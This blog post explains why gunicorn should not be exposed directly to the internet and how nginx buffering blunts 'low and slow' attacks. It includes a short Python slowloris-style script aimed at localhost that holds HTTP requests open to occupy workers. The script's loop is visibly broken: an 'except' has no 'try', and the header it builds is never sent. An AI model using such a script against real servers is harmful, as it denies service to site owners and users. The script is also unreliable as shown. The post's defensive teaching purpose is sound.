How not to deploy web applications

Last updated on April 29, 2018, in Python

Recently, I was looking for tutorials on how to deploy a Django application in 2018. After some research, I found an article which suggests using gunicorn behind nginx web server, which is a pretty standard way of doing it. However, one thing has caught my attention.

The author of the article suggests binding a gunicorn server to Which opens gunicorn to the external world (the internet).

gunicorn -b app.wsgi

At first glance, you can think that it is not a big problem and there is nothing to worry about. In reality, you should never expose an internal WSGI web server to the internet. Knowing the port, an attacker can quickly make your gunicorn server unavailable. The interesting part is that you do not need to burst it with lots of traffic. You can completely shut down the server by sending a small stream of data.

By default, gunicorn uses synchronous worker model, where each worker can handle one request at a time. Luckily, that is not a big deal, because on average, a simple web application can generate a response under 200 milliseconds. So if all workers are occupied the client have to wait a few hundreds of milliseconds additionally. Also keep in mind, that most of the websites rarely get more than one requests at a time.

In gunicorn, the default number of workers is one, so to make a gunicorn web server a little bit busy an attacker should send more than one request at a time. However, that is a pretty dumb and straightforward idea which generates a lot of traffic.

To completely occupy a single worker an attacker can use a low and slow attack, which slows down a single HTTP request in such way that it makes the web server busy waiting for the rest of the data.

import random
import socket
import string
import time

def init_request(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))

    s.send(b"GET / HTTP/1.1\r\n")
    return s

ip = "localhost"
port = 8000

workers_count = 1
sockets = [init_request(ip, port) for _ in range(workers_count)]

while True:
    for i, s in enumerate(sockets):
            # check a connection by sending a random header
            header = "%s: %s\r\n" % (random.choice(string.ascii_letters), random.randint(1, 99999))
        except socket.error:
            # recreate a dead socket
            sockets[i] = init_request(ip, port)

The script above creates a TCP connection to the web server and sends only a part of the HTTP request, so the gunicorn waits for the rest of data. The default timeout for an HTTP request is set to 30 seconds. By creating a simple connection, we are blocking the whole website for 30 seconds! It does not matter how many workers you are using, because creating such connections is very cheap.

How Nginx helps with slow and low attacks

As it turns out, the NGINX server is buffering all request before sending it to the WSGI server. That is, it waits for a complete request body and then sends it to a gunicorn web server. A typical configuration of nginx can handle thousands of slow simultaneous requests.

When buffering is enabled, the entire request body is read from the client before sending the request to a proxied server.

When buffering is disabled, the request body is sent to the proxied server immediately as it is received. In this case, the request cannot be passed to the next server if nginx already started sending the request body.

When HTTP/1.1 chunked transfer encoding is used to send the original request body, the request body will be buffered regardless of the directive value unless HTTP/1.1 is enabled for proxying.

That is one of the reasons why you should always use NGINX in front of your web application. Be aware of HTTP details and don't use it for evil :).

Want a monthly digest of these blog posts?